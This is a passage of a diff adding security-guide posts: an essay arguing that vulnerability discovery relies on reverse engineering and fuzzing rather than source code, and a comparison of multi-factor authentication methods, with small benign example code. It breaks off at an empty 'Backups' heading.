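    # vulnerable service is enough for a compromise.
    return port not in BLOCKED_PORTS

# A service on port 8080 you never thought about:
assert default_deny(8080) is False   # blocked until you opt it in
assert default_permit(8080) is True  # silently exposed
```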

## Conclusion

By now, I hope I have clearly explained why badness enumeration is never the solution to the problem. Sometimes, it can be a nice-to-have thing, like a VPN provider blocking advertisements and trackers on the DNS level to make the web experience more enjoyable. Other times, it can be harmful to your privacy and security, like with a malicious/vulnerable extension or antivirus. The important thing to keep in mind is that you cannot rely on badness enumeration for true privacy and security, and you should always be aware of the privacy and security implications that certain options may entail.

223
content/posts/knowledge/FLOSS Security.md
Normal file
@ -0,0 +1,223 @@
---
title: "FLOSS Security"
date: "2022-02-02T23:16:00+00:00"
tags: ['Knowledge Base', 'Privacy', 'Security']
author: Rohan Kumar
canonicalURL: https://seirdy.one/posts/2022/02/02/floss-security/
ShowCanonicalLink: true
---

While source code is critical for user autonomy, it isn't required to evaluate software security or understand run-time behavior.

One of the biggest parts of the Free and Open Source Software definitions is the freedom to study a program and modify it; in other words, access to editable source code. I agree that such access is essential; however, far too many people support source availability for the _wrong_ reasons. One such reason is that source code is necessary to have any degree of transparency into how a piece of software operates, and is therefore necessary to determine if it is at all secure or trustworthy. Although security through obscurity is certainly not a robust measure, this claim has two issues:

- Source code describes what a program is designed to do; it is unnecessary and insufficient to determine if what it actually does aligns with its intended design.
- Vulnerability discovery doesn't require source code.

I'd like to expand on these issues, focusing primarily on compiled binaries. Bear in mind that I do not think that source availability is _useless_ from a security perspective (it certainly makes audits easier), and I _do_ think that source availability is required for user freedom. I'm arguing only that **source unavailability doesn't imply insecurity**, and **source availability doesn't imply security**. It's possible (and often preferable) to perform security analysis on binaries, without necessarily having source code. In fact, vulnerability discovery doesn't typically rely upon source code analysis.

I'll update this post occasionally as I learn more on the subject. If you like it, check back in a month or two to see if it has something new.

_PS: this stance is not absolute; I concede to several good counter-arguments [at the bottom](#good-counter-arguments)!_

## How security fixes work

I don't think anyone seriously claims that software's security instantly improves the second its source code is published. The argument I'm responding to is that source code is necessary to understand what a program does and how (in)secure it is, and without it we can't know for sure.

Assuming a re-write that fundamentally changes a program's architecture is not an option[^1], software security typically improves by fixing vulnerabilities via something resembling this process:

1. Someone discovers a vulnerability
2. Developers are informed of the vulnerability
3. Developers reproduce the issue and understand what caused it
4. Developers patch the software to fix the vulnerability

Source code is typically helpful (sometimes essential) to Step 3. If someone has completed Step 3, they will require source code to proceed to Step 4. Source code _isn't necessary for Steps 1 and 2_; these steps rely upon understanding how a program misbehaves. For that, we use _reverse engineering_ and/or _fuzzing_.

## Reverse engineering

Understanding _how a program is designed_ is not the same as understanding _what a program does._ A reasonable level of one type of understanding does not imply the other.

Source code[^2] is essential to describe a program's high-level, human-comprehensible design; it represents a contract that outlines how a developer _expects_ a program to behave. A compiler or interpreter[^3] must then translate it into machine instructions. But source code isn't always easy to map directly to machine instructions because it is part of a complex system:

- Compilers (sometimes even interpreters) can apply optimizations and hardening measures that are difficult to reason about. This is especially true for Just-In-Time compilers that leverage run-time information.

- The operating system itself may be poorly understood by the developers, and run a program in a way that contradicts a developer's expectations.

- Toolchains, interpreters, and operating systems can have bugs that impact program execution.

- Different compilers and compiler flags can offer different security guarantees and mitigations.

- Source code [can be deceptive](https://en.wikipedia.org/wiki/Underhanded_C_Contest) by featuring sneaky obfuscation techniques, sometimes unintentionally. Confusing naming patterns, re-definitions, and vulnerabilities masquerading as innocent bugs (plausible deniability; look up "hypocrite commits" for an example) have all been well-documented.

- All of the above points apply to each dependency and the underlying operating system, which can impact a program's behavior.

Furthermore, all programmers are flawed mortals who don't always fully understand source code. Everyone who's done a non-trivial amount of programming is familiar with the feeling of encountering a bug during run-time for which the cause is impossible to find...until they notice it staring them in the face on Line 12. Think of all the bugs that _aren't_ so easily noticed.

Reading the source code, compiling, and passing tests isn't sufficient to show us a program's final behavior. The only way to know what a program does when you run it is to...run it.[^4]

### Special builds

Almost all programmers are fully aware of their limited ability, which is why most already employ techniques to analyze run-time behavior that don't depend on source code. For example, developers of several compiled languages[^5] can build binaries with sanitizers to detect undefined behavior, races, uninitialized reads, etc. that human eyes may have missed when reading source code. While source code is necessary to _build_ these binaries, it isn't necessary to run them and observe failures.

Distributing binaries with sanitizers and debug information to testers is a valid way to collect data about a program's potential security issues.

### Dynamic analysis

It's hard to figure out which syscalls and files a large program needs by reading its source, especially when certain libraries (e.g. the libc implementation/version) can vary. A syscall tracer like [`strace(1)`](https://strace.io/)[^6] makes the process trivial.

A personal example: the understanding I gained from `strace` was necessary for me to write my [bubblewrap scripts](https://sr.ht/~seirdy/bwrap-scripts/). These scripts use [`bubblewrap(1)`](https://github.com/containers/bubblewrap) to sandbox programs with the minimum permissions possible. Analyzing every relevant program and library's source code would have taken me months, while `strace` gave me everything I needed to know in an afternoon: analyzing the `strace` output told me exactly which syscalls to allow and which files to grant access to, without even having to know what language the program was written in. I generated the initial version of the syscall allow-lists with the following command[^7]:

```
strace name-of-program program-args 2>&1 \
| rg '^([a-z_]*)\(.*' --replace '$1' \
| sort | uniq
```

This also extends to determining how programs utilize the network: packet sniffers like [Wireshark](https://www.wireshark.org/) can determine when a program connects to the network, and where it connects.

These methods are not flawless. Syscall tracers are only designed to shed light on how a program interacts with the kernel. Kernel interactions tell us plenty (it's sometimes all we need), but they don't give the whole story. Furthermore, packet inspection can be made a bit painful by transit encryption[^8]; tracing a program's execution alongside packet inspection can offer clarity, but this is not easy.

For more information, we turn to [**core dumps**](https://en.wikipedia.org/wiki/Core_dump), also known as memory dumps. Core dumps share the state of a program during execution or upon crashing, giving us greater visibility into exactly what data a program is processing. Builds containing debugging symbols (e.g. [DWARF](https://dwarfstd.org/)) have more detailed core dumps. Vendors that release daily snapshots of pre-release builds typically include some symbols to give testers more detail concerning the causes of crashes. Web browsers are a common example: Chromium dev snapshots, Chrome Canary, Firefox Nightly, WebKit Canary builds, etc. all include debug symbols. [Until 2019](https://twitter.com/MisteFr/status/1168597562703716354?s=20), _Minecraft: Bedrock Edition_ included debug symbols which were used heavily by the modding community.[^9]

#### Dynamic analysis example: Zoom

In 2020, Zoom Video Communications came under scrutiny for marketing its "Zoom" software as a secure, end-to-end encrypted solution for video conferencing. Zoom's documentation claimed that it used "AES-256" encryption. Without source code, did we have to take the docs at their word?

[The Citizen Lab](https://citizenlab.ca/) didn't. In April 2020, it published [a report](https://citizenlab.ca/2020/04/move-fast-roll-your-own-crypto-a-quick-look-at-the-confidentiality-of-zoom-meetings/) revealing critical flaws in Zoom's encryption. It utilized Wireshark and [mitmproxy](https://mitmproxy.org/) to analyze networking activity, and inspected core dumps to learn about its encryption implementation. The Citizen Lab's researchers found that Zoom actually used an incredibly flawed implementation of a weak version of AES-128 (ECB mode), and easily bypassed it.

Syscall tracing, packet sniffing, and core dumps are great, but they rely on manual execution which might not hit all the desired code paths. Fortunately, there are other forms of analysis available.

### Binary analysis

Tracing execution and inspecting memory dumps can be considered forms of reverse engineering, but they only offer a surface-level view of what's going on. Reverse engineering gets much more interesting when we analyze a binary artifact.

Static binary analysis is a powerful way to inspect a program's underlying design. Decompilation (especially when supplemented with debug symbols) can re-construct a binary's assembly or source code. Symbol names may look incomprehensible in stripped binaries, and comments will be missing. What's left is more than enough to decipher control flow to uncover how a program processes data. This process can be tedious, especially if a program uses certain forms of binary obfuscation.

The goal doesn't have to be a complete understanding of a program's design (incredibly difficult without source code); it's typically to answer a specific question, fill in a gap left by tracing/fuzzing, or find a well-known property. When developers publish documentation on the security architecture of their closed-source software, reverse engineering tools like decompilers are exactly what you need to verify their honesty (or lack thereof).

Decompilers are seldom used alone in this context. Instead, they're typically a component of reverse engineering frameworks that also sport memory analysis, debugging tools, scripting, and sometimes even IDEs. I use [the radare project](https://www.radare.org/n/), but [Ghidra](https://ghidra-sre.org/) is also popular. Their documentation should help you get started if you're interested.

### Example: malware analysis

These reverse-engineering techniques---a combination of tracing, packet sniffing, binary analysis, and memory dumps---make up the workings of most modern malware analysis. See [this example](https://www.hybrid-analysis.com/sample/1ef3b7e9ba5f486afe53fcbd71f69c3f9a01813f35732222f64c0981a0906429/5e428f69c88e9e64c33afe64) of a fully-automated analysis of the Zoom Windows installer. It enumerates plenty of information about Zoom without access to its source code: reading unique machine information, anti-VM and anti-reverse-engineering tricks, reading config files, various types of network access, scanning mounted volumes, and more.

To try this out yourself, use a sandbox designed for dynamic analysis. [Cuckoo](https://github.com/cuckoosandbox) is a common and easy-to-use solution, while [DRAKVUF](https://drakvuf.com/) is more advanced.

### Extreme example: the truth about Intel ME and AMT

The Intel Management Engine (ME) is a mandatory subsystem of all Intel processors (after 2008) with extremely privileged access to the host system. Active Management Technology (AMT) runs atop it on the subset of Intel processors with "vPro" branding. The latter can be disabled and is intended for organizations to remotely manage their inventory (installing software, monitoring, remote power-on/sleep/wake, etc).

The fact that Intel ME has such deep access to the host system and the fact that it's proprietary have both made it the subject of a high degree of scrutiny. Many people (most of whom have little experience in the area) connected these two facts together to allege that the ME is a backdoor, often by confusedly citing functionality of Intel AMT instead of ME. Is it really impossible to know for sure?

I picked Intel ME+AMT to serve as an extreme example: it shows both the power and limitations of the analysis approaches covered. ME isn't made of simple executables you can just run in an OS because it sits far below the OS, in what's sometimes called "Ring -3".[^10] Analysis is limited to external monitoring (e.g. by monitoring network activity) and reverse-engineering unpacked partially-obfuscated firmware updates, with help from official documentation. This is slower and harder than analyzing a typical executable or library.

Answers are a bit complex and...more boring than what sensationalized headlines would say. Reverse engineers such as Igor Skochinsky and Nicola Corna (the developers of [me-tools](https://github.com/skochinsky/me-tools) and [me_cleaner](https://github.com/corna/me_cleaner), respectively) have [analyzed ME](https://fahrplan.events.ccc.de/congress/2017/Fahrplan/system/event_attachments/attachments/000/003/391/original/Intel_ME_myths_and_reality.pdf), while researchers such as Vassilios Ververis [thoroughly analyzed AMT](https://kth.diva-portal.org/smash/get/diva2:508256/FULLTEXT01) in 2010. Interestingly, the former pair argues that auditing binary code is preferable to potentially misleading source code: binary analysis allows auditors to "cut the crap" and inspect what software is truly made of. However, this was balanced by a form of binary obfuscation that the pair encountered; I'll describe it in a moment.

Simply monitoring network activity and systematically testing all claims made by the documentation allowed Ververis to uncover a host of security issues in Intel AMT. However, no undocumented features have (to my knowledge) been uncovered. The problematic findings revolved around flawed/insecure implementations of documented functionality. In other words: there's been no evidence of AMT being "a backdoor", but its security flaws could have had a similar impact. Fortunately, AMT can be disabled. What about ME?

This is where some binary analysis comes in. Neither Skochinsky's [ME Secrets](https://recon.cx/2014/slides/Recon%202014%20Skochinsky.pdf) presentation nor the [previously-linked one](https://fahrplan.events.ccc.de/congress/2017/Fahrplan/system/event_attachments/attachments/000/003/391/original/Intel_ME_myths_and_reality.pdf) he gave with Corna seem to enumerate any contradictions with [official documentation](https://link.springer.com/book/10.1007/978-1-4302-6572-6).

Unfortunately, some components are poorly understood due to being obfuscated using [Huffman compression with unknown dictionaries](http://io.netgarage.org/me/). Understanding the inner workings of the obfuscated components blurs the line between software reverse-engineering and figuring out how the chips are actually made, the latter of which is nigh-impossible if you don't have access to a chip lab full of cash. However, black-box analysis does tell us about the capabilities of these components: see page 21 of "ME Secrets". Thanks to zdctg for clarifying this.

Skochinsky's and Corna's analysis was sufficient to clarify (but not completely contradict) sensationalism claiming that ME can remotely lock any PC (it was a former opt-in feature), can spy on anything the user does (they clarified that access is limited to unblocked parts of the host memory and the integrated GPU, but doesn't include e.g. the framebuffer), etc.

While claims such as "ME is a black box that can do anything" are misleading, ME is not without its share of vulnerabilities. My favorite look at its issues is a presentation by [Mark Ermolov](https://www.blackhat.com/eu-17/speakers/Mark-Ermolov.html) and [Maxim Goryachy](https://www.blackhat.com/eu-17/speakers/Maxim-Goryachy.html) at Black Hat Europe 2017: [How to Hack a Turned-Off Computer, or Running Unsigned Code in Intel Management Engine](https://www.blackhat.com/docs/eu-17/materials/eu-17-Goryachy-How-To-Hack-A-Turned-Off-Computer-Or-Running-Unsigned-Code-In-Intel-Management-Engine-wp.pdf).

In short: ME being proprietary doesn't mean that we can't find out how (in)secure it is. Binary analysis when paired with runtime inspection can give us a good understanding of what trade-offs we make by using it. While ME has a history of serious vulnerabilities, they're nowhere near what [borderline conspiracy theories](https://web.archive.org/web/20210302072839/themerkle.com/what-is-the-intel-management-engine-backdoor/) claim.[^11]

(Note: Intel is not alone here. Other chips typically have equivalents, e.g. AMD Secure Technology).

## Fuzzing

Manual invocation of a program paired with a tracer like `strace` won't always exercise all code paths or find edge-cases. [Fuzzing helps bridge this gap](https://en.wikipedia.org/wiki/Fuzzing): it automates the process of causing a program to fail by generating random or malformed data to feed it. Researchers then study failures and failure-conditions to isolate a bug.
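
The core loop is simple enough to sketch; the parser below is a made-up function with a planted bug, and real fuzzers add input mutation and coverage feedback on top of this idea:

```
import random

def parse_record(data: bytes) -> int:
    # Hypothetical function under test, with a planted bug: a zero
    # length field causes a division by zero.
    length = data[0]
    return sum(data[1:1 + length]) // length

crashes = []
for _ in range(10_000):
    blob = bytes(random.randrange(256) for _ in range(random.randrange(1, 32)))
    try:
        parse_record(blob)
    except Exception as exc:
        crashes.append((blob, exc))  # keep the reproducer for triage

print(f"{len(crashes)} crashing inputs found")
```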

Fuzzing doesn't necessarily depend on access to source code, as it is a black-box technique. Fuzzers like [American Fuzzy Lop (AFL)](https://lcamtuf.coredump.cx/afl/) normally use [special builds](#special-builds), but [other fuzzing setups](https://aflplus.plus/docs/binaryonly_fuzzing/) can work with just about any binaries. In fact, some types of fuzz tests (e.g. [fuzzing an API](https://github.com/KissPeter/APIFuzzer/) for a web service) hardly need any implementation details.

Fuzzing frequently catches bugs that are only apparent by running a program, not by reading source code. Even so, the biggest beneficiaries of fuzzing are open source projects. [cURL](https://github.com/curl/curl-fuzzer), [OpenSSL](https://github.com/openssl/openssl/tree/master/fuzz), web browsers, text rendering libraries (HarfBuzz, FreeType) and toolchains (GCC, Clang, the official Go toolchain, etc.) are some notable examples.

> I've said it before but let me say it again: fuzzing is really the top method to find problems in curl once we've fixed all flaws that the static analyzers we use have pointed out. The primary fuzzing for curl is done by OSS-Fuzz, that tirelessly keeps hammering on the most recent curl code.

- [Daniel Stenberg](https://daniel.haxx.se/) | [A Google grant for libcurl work](https://daniel.haxx.se/blog/2020/09/23/a-google-grant-for-libcurl-work/)

If you want to get started with fuzzing, I recommend checking out [the quick-start guide for American Fuzzy Lop](https://github.com/google/AFL/blob/master/docs/QuickStartGuide.txt). Some languages, like Go 1.18, also have fuzzing tools available right in the standard library.

### Example: CVE-2022-0185

A recent example of how fuzzing helps spot a vulnerability in an open-source project is [CVE-2022-0185](https://www.openwall.com/lists/oss-security/2022/01/18/7): a Linux 0-day found by the Crusaders of Rust a few weeks ago. It was discovered using the [syzkaller](https://github.com/google/syzkaller) kernel fuzzer. The process was documented on Will's Root:

[CVE-2022-0185 - Winning a $31337 Bounty after Pwning Ubuntu and Escaping Google's KCTF Containers](https://www.willsroot.io/2022/01/cve-2022-0185.html) by [willsroot](https://willsroot.io)

I _highly_ encourage giving it a read; it's the perfect example of fuzzing with sanitizers to find a vulnerability, reproducing the vulnerability (by writing a tiny C program), _then_ diving into the source code to find and fix the cause, and finally reporting the issue (with a patch!). When source isn't available, the vendor would assume responsibility for the "find and fix" steps.

The fact that some of the most-used pieces of FLOSS in existence have been the biggest beneficiaries of source-agnostic approaches to vulnerability analysis should be quite revealing. The source code to these projects has received attention from millions of eyes, yet they _still_ invest in fuzzing infrastructure and vulnerability-hunters prefer analyzing artifacts over inspecting the source.

## Good counter-arguments

I readily concede to several points in favor of source availability from a security perspective:

- Source code can make analysis _easier_ by _supplementing_ source-independent approaches. The lines between the steps I mentioned in the [four-step vulnerability-fixing process](#how-security-fixes-work) are blurry.

- Patching vulnerabilities is important. Source availability makes it possible for the community, package maintainers, or reporters of a vulnerability to patch software. Package maintainers often blur the line between "packager" and "contributor" by helping projects migrate away from abandoned/insecure dependencies. One example that comes to mind is the Python 2 to Python 3 transition for projects like Calibre.[^12] Being able to fix issues independent of upstream support is an important mitigation against [user domestication](https://seirdy.one/posts/2021/01/27/whatsapp-and-the-domestication-of-users/).

- Some developers/vendors don't distribute binaries that make use of modern toolchain-level exploit mitigations (e.g. <abbr title="Position-Independent Executables">PIE</abbr>, <abbr title="ReLocation Read-Only">RELRO</abbr>, stack canaries, automatic variable initialization, [<abbr title="Control-Flow Integrity">CFI</abbr>](https://clang.llvm.org/docs/ControlFlowIntegrity.html), etc.[^13]). In these cases, building software yourself with these mitigations (or delegating it to a distro that enforces them) requires source code availability (or at least some sort of intermediate representation).

- Closed-source software may or may not have builds available that include sanitizers and debug symbols.

- Although fuzzing release binaries is possible, fuzzing is much easier to do when source code is available. Vendors of proprietary software seldom release special fuzz-friendly builds, and filtering out false-positives can be quite tedious without understanding high-level design.

- It is certainly possible to notice a vulnerability in source code. Excluding low-hanging fruit typically caught by static code analysis and peer review, it's not the main way most vulnerabilities are found nowadays (thanks to [X_CLI](https://www.broken-by-design.fr/) for [reminding me about what source analysis does accomplish](https://lemmy.ml/post/167321/comment/117774)).

- Software as a Service can be incredibly difficult to analyze, as we typically have little more than the ability to query a server. Servers don't send core dumps, server-side binaries, or trace logs for analysis. Furthermore, it's difficult to verify which software a server is running.[^14] For services that require trusting a server, access to the server-side software is important from both a security and a user-freedom perspective.

Most of this post is written with the assumption that binaries are inspectable and traceable. Binary obfuscation and some forms of content protection/<abbr title="Digital Rights Management">DRM</abbr> violate this assumption and actually do make analysis more difficult.

Beyond source code, transparency into the development process helps assure users of compliance with good security practices. Viewing VCS history, patch reviews, linter configurations, etc. reveals the standards that code is being held up to, some of which can be related to bug-squashing and security.

[Patience](https://matrix.to/#/@hypokeimenon:tchncs.de) on Matrix also had a great response, which I agree with and adapt below:

Whether or not the source code is available for software does not change how insecure it is. However, there are good security-related incentives to publish source code.

- Doing so improves vulnerability patchability and future architectural improvement by lowering the barrier to contribution. The fixes that follow can be _shared and used by other projects_ across the field, some of which can in turn be used by the vendor. This isn't a zero-sum game; a rising tide lifts all boats.
- It's generally good practice to assume an attacker has full knowledge of a system instead of relying on security through obscurity. Releasing code provides strong assurance that this assumption is being made. It's a way for vendors to put their money where their mouth is.

Both Patience and [Drew DeVault](https://drewdevault.com/) argue that given the above points, a project whose goal is maximum security would release code. Strictly speaking, I agree. Good intentions don't imply good results, but they can _supplement_ good results to provide some trust in a project's future.

## Conclusion

I've gone over some examples of how analyzing software's security properties need not depend on source code, and how vulnerability discovery in both FLOSS and proprietary software uses source-agnostic techniques. Dynamic and static black-box techniques are powerful tools that work well from user-space (Zoom) to kernel-space (Linux) to low-level components like Intel ME+AMT. Source code enables the vulnerability-fixing process but has limited utility for the evaluation/discovery process.

Don't assume software is safer than proprietary alternatives just because its source is visible; come to a conclusion after analyzing both. There are lots of great reasons to switch from macOS or Windows to Linux (it's been my main OS for years), but security is [low on that list](https://madaidans-insecurities.github.io/linux.html).

All other things being mostly equal, FLOSS is obviously _preferable_ from a security perspective; I listed some reasons why in the counter-arguments section. Unfortunately, being helpful is not the same as being necessary. All I argue is that source unavailability does not imply insecurity, and source availability does not imply security. Analysis approaches that don't rely on source are typically the most powerful, and can be applied to both source-available and source-unavailable software. Plenty of proprietary software is more secure than FLOSS alternatives; few would argue that the sandboxing employed by Google Chrome or Microsoft Edge is more vulnerable than Pale Moon or most WebKitGTK-based browsers, for instance.

Releasing source code is just one thing vendors can do to improve audits; other options include releasing test builds with debug symbols/sanitizers, publishing docs describing their architecture, and/or just keeping software small and simple. We should evaluate software security through _study_ rather than source model. Support the right things for the right reasons, and help others make informed choices with accurate information. There are enough good reasons to support software freedom; we don't need to rely on bad ones.

[^1]: Writing an alternative or re-implementation doesn't require access to the original's source code, as is evidenced by a plethora of clean-room re-implementations of existing software written to circumvent the need to comply with license terms.

[^2]: Ideally well-documented, non-obfuscated code.

[^3]: Or a JIT compiler, or a [bunch of clockwork](https://en.wikipedia.org/wiki/Analytical_Engine), or...

[^4]: For completeness, I should add that there is one source-based approach that can verify correctness: formal proofs. Functional programming languages that [support dependent types](https://en.wikipedia.org/wiki/Dependent_type) can be provably correct at the source level. Assuming their self-hosted toolchains have similar guarantees, developers using these languages might have to worry less about bugs they couldn't find in the source code. This can alleviate concerns that their language runtimes can make it hard to reason about low-level behavior. Thanks to [Adrian Cochrane](https://adrian.geek.nz/) for pointing this out.

[^5]: For example: C, C++, Objective-C, Go, Fortran, and others can utilize sanitizers from Clang and/or GCC.

[^6]: This is probably what people in _The Matrix_ were using to see that iconic [digital rain](https://en.wikipedia.org/wiki/Matrix_digital_rain).

[^7]: This command only lists syscall names, but I did eventually follow the example of [sandbox-app-launcher](https://github.com/Whonix/sandbox-app-launcher) by allowing certain syscalls (e.g. ioctl) only when invoked with certain parameters. Also, I used [ripgrep](https://github.com/BurntSushi/ripgrep) because I'm more familiar with <abbr title="Perl-Compatible Regular Expressions">PCRE</abbr>-style capture groups.

[^8]: Decrypting these packets typically involves saving and using key logs, or using endpoints with [known pre-master secrets](https://blog.didierstevens.com/2020/12/14/decrypting-tls-streams-with-wireshark-part-1/).

[^9]: I invite any modders who miss these debug symbols to check out the FLOSS [Minetest](https://www.minetest.net/), perhaps with the [MineClone2](https://content.minetest.net/packages/Wuzzy/mineclone2/) game.

[^10]: See pages 127-130 of the Invisible Things Lab's [Quest to the Core slides](https://invisiblethingslab.com/resources/misc09/Quest%20To%20The%20Core%20%28public%29.pdf). Bear in mind that they often refer to AMT running atop ME.

[^11]: As an aside: your security isn't necessarily improved by "disabling" it, since it still runs during the initial boot sequence and does provide some hardening measures of its own (e.g., a <abbr title="Trusted Platform Module">TPM</abbr>).

[^12]: In 2017, Calibre's author actually wanted to stay with Python 2 after its EOL date, and [maintain Python 2 himself](https://bugs.launchpad.net/calibre/+bug/1714107). Users and package maintainers were quite unhappy with this, as Python 2 would no longer be receiving security fixes after 2020. While official releases of Calibre use a bundled Python interpreter, distro packages typically use the system Python package; Calibre's popularity and insistence on using Python 2 made it a roadblock to getting rid of the Python 2 package in most distros. What eventually happened was that community members (especially [Eli Schwartz](https://github.com/eli-schwartz) and [Flaviu Tamas](https://flaviutamas.com/)) submitted patches to migrate Calibre away from Python 2. Calibre migrated to Python 3 by [version 5.0](https://calibre-ebook.com/new-in/fourteen).

[^13]: Linux distributions' CFI+<abbr title="Address-Space Layout Randomization">ASLR</abbr> implementations rely on executables compiled with CFI+PIE support, and ideally with stack-smashing protectors and no-execute bits. These implementations are flawed (see [On the Effectiveness of Full-ASLR on 64-bit Linux](https://web.archive.org/web/20211021222659/http://cybersecurity.upv.es/attacks/offset2lib/offset2lib-paper.pdf) and [Brad Spengler's presentation comparing these with PaX's own implementation](https://grsecurity.net/PaX-presentation.pdf)).

[^14]: The [best attempt I know of](https://signal.org/blog/private-contact-discovery/) leverages [Trusted Execution Environments](https://en.wikipedia.org/wiki/Trusted_execution_environment), but for limited functionality using an implementation that's [far from bulletproof](https://en.wikipedia.org/wiki/Software_Guard_Extensions#Attacks).

84
content/posts/knowledge/Multi-factor Authentication.md
Normal file
@ -0,0 +1,84 @@
---
title: "Multi-factor Authentication"
date: 2022-07-16
tags: ['Knowledge Base', 'Security']
author: Tommy
---

**Multi-factor authentication** is a security mechanism that requires additional verification beyond your username (or email) and password. This usually comes in the form of a one-time passcode, a push notification, or plugging in and tapping a hardware security key.

## Common protocols

### Email and SMS MFA

Email and SMS MFA are examples of the weaker MFA protocols. Email MFA is not great, as whoever controls your email account can typically both reset your password and receive your MFA verification. SMS, on the other hand, is problematic due to the lack of any kind of encryption, making it vulnerable to sniffing. [SIM swap](https://en.wikipedia.org/wiki/SIM_swap_scam) attacks, if carried out successfully, will allow an attacker to receive your one-time passcode while locking you out of your own account. In certain cases, websites or services may also allow the user to reset their account login by calling them using the phone number used for MFA, which could be faked with a [spoofed CallerID](https://en.wikipedia.org/wiki/Caller_ID_spoofing).

Only use these protocols when they are the only option you have, and be very careful with SMS MFA, as it could actually worsen your security.

### Push Confirmations

Push confirmation MFA is typically a notification being sent to an app on your phone asking you to confirm new account logins. This method is a lot better than SMS or email, since an attacker typically wouldn't be able to get these push notifications without having an already logged-in device.

Push confirmation in most cases relies on a third-party provider like [Duo](https://duo.com/). This means that trust is placed in a server that neither you nor your service provider control. A malicious push confirmation server could compromise your MFA or profile you based on which website and account you use with the service.

Even if the push notification application and server are provided by a first party, as is the case with Microsoft login and [Microsoft Authenticator](https://www.microsoft.com/en-us/security/mobile-authenticator-app), there is still a risk of you accidentally tapping on the confirmation button.

### Time-based One-time Password (TOTP)

TOTP is one of the most common forms of MFA available. When you set up TOTP, you establish a "[shared secret](https://en.wikipedia.org/wiki/Shared_secret)" with the service that you intend to use and store it in your authentication app.

The time-limited code is then derived from the shared secret and the current time. As the code is only valid for a short time, without access to the shared secret, an adversary cannot generate new codes.
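
To make that concrete, here is a minimal Python sketch of the derivation standardized in RFC 6238 (the secret below is a well-known test value, not a real account):

```
import base64
import hashlib
import hmac
import struct
import time

def totp(shared_secret_b32: str, period: int = 30, digits: int = 6) -> str:
    key = base64.b32decode(shared_secret_b32)
    counter = int(time.time()) // period  # current 30-second window
    digest = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F            # dynamic truncation (RFC 4226)
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

print(totp("JBSWY3DPEHPK3PXP"))  # same secret + same time window = same code
```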

If you have a [Yubikey](https://www.yubico.com/), you should store the "shared secrets" on the key itself using the [Yubico Authenticator](https://www.yubico.com/products/yubico-authenticator/) app. After the initial setup, the Yubico Authenticator will only expose the six-digit code to the machine it is running on, not the shared secret. Additional security can be set up by requiring touch confirmation, protecting codes not in use from a compromised operating system.

Unlike [WebAuthn](#fido2-fast-identity-online), TOTP offers no protection against [phishing](https://en.wikipedia.org/wiki/Phishing) or reuse attacks. If an adversary obtains a valid code from you, they may use it as many times as they like until it expires (generally 30 seconds + grace period).

Despite its shortcomings, we consider TOTP better and safer than Push Confirmations.

### Yubico OTP

Yubico OTP is an authentication protocol typically implemented in hardware security keys. When you decide to use Yubico OTP, the key will generate a public ID, a private ID, and a secret key, which is then uploaded to the Yubico OTP server.

When logging into a website, all you need to do is to physically touch the security key. The security key will emulate a keyboard and print out a one-time password into the password field.

The service will then forward the one-time password to the Yubico OTP server for validation. A counter is incremented both on the key and on Yubico's validation server. The OTP can only be used once; when a successful authentication occurs, the counter is increased, which prevents reuse of the OTP. Yubico provides a [detailed document](https://developers.yubico.com/OTP/OTPs_Explained.html) about the process.
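
A minimal sketch of that replay protection (the storage and the authenticity check are stand-ins for Yubico's actual implementation): the server accepts an OTP only if its counter is strictly greater than the last one seen for that key:

```
last_counter: dict[str, int] = {}  # public ID -> highest counter accepted

def validate(public_id: str, counter: int, otp_is_authentic: bool) -> bool:
    # otp_is_authentic stands in for decrypting the OTP with the key's
    # AES secret and verifying its integrity, which is elided here.
    if not otp_is_authentic:
        return False
    if counter <= last_counter.get(public_id, -1):
        return False  # replayed OTP, or a cloned key lagging behind
    last_counter[public_id] = counter
    return True

assert validate("ccccccabcdef", 41, True) is True
assert validate("ccccccabcdef", 41, True) is False  # same OTP replayed
```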



The Yubico validation server is a cloud-based service, and you're placing trust in Yubico that their server won't be used to bypass your MFA or profile you. The public ID associated with Yubico OTP is reused on every website and could be another avenue for third parties to profile you. Like TOTP, Yubico OTP does not provide phishing resistance.

Yubico OTP is an inferior protocol compared to TOTP, since TOTP does not need trust in a third-party server and most security keys that support Yubico OTP (namely the YubiKey and OnlyKey) support TOTP anyway. Yubico OTP is still better than Push Confirmation, however.

### FIDO2 (Fast IDentity Online)

[FIDO](https://en.wikipedia.org/wiki/FIDO_Alliance) includes a number of standards; first there was U2F and then later [FIDO2](https://en.wikipedia.org/wiki/FIDO2_Project) which includes the web standard [WebAuthn](https://en.wikipedia.org/wiki/WebAuthn).

U2F and FIDO2 refer to the [Client to Authenticator Protocol](https://en.wikipedia.org/wiki/Client_to_Authenticator_Protocol), which is the protocol between the security key and the computer, such as a laptop or phone. It complements WebAuthn which is the component used to authenticate with the website (the "Relying Party") you're trying to log in on.

WebAuthn is the most secure and private form of second factor authentication. While the authentication experience is similar to Yubico OTP, the key does not print out a one-time password and validate with a third-party server. Instead, it uses [public key cryptography](https://en.wikipedia.org/wiki/Public-key_cryptography) for authentication.

{{< youtube id="aMo4ZlWznao">}}

Since FIDO2/WebAuthn uses unique cryptographic keys with each internet site, a site pretending to be another one will not be able to get the correct response to the MFA challenge, making FIDO2/WebAuthn invulnerable to phishing. It is also because of this authentication mechanism that a physical FIDO2 security key is not identifiable across different services, unlike Yubico OTP. Even better, FIDO2 uses a counter for each authentication, which helps with detecting cloned keys.
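
A conceptual sketch of why the phishing resistance works (this is not a real WebAuthn client; the structure loosely mirrors the client data the browser assembles): the origin is filled in by the browser, not the page, and it is covered by the authenticator's signature, so a look-alike domain produces a response the real site rejects:

```
import hashlib
import json

def client_data_hash(challenge: str, origin: str) -> bytes:
    # The browser supplies "origin" itself; a phishing page cannot lie
    # about the domain the user is actually visiting.
    client_data = json.dumps({
        "type": "webauthn.get",
        "challenge": challenge,
        "origin": origin,
    }).encode()
    return hashlib.sha256(client_data).digest()

legit = client_data_hash("server-challenge", "https://example.com")
phish = client_data_hash("server-challenge", "https://examp1e.com")
assert legit != phish  # the signed hash differs, so verification fails
```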

If a website or service supports WebAuthn for authentication, it is highly recommended that you use it over any other form of MFA.

## Notes

### Initial Set Up

When buying a security key, it is important that you change the default credentials, set up password protection for the key, and enable touch confirmation if your key supports it. Products such as the YubiKey have multiple interfaces with separate credentials for each one of them, so you should go over each interface and set up protection as well.

### Backups

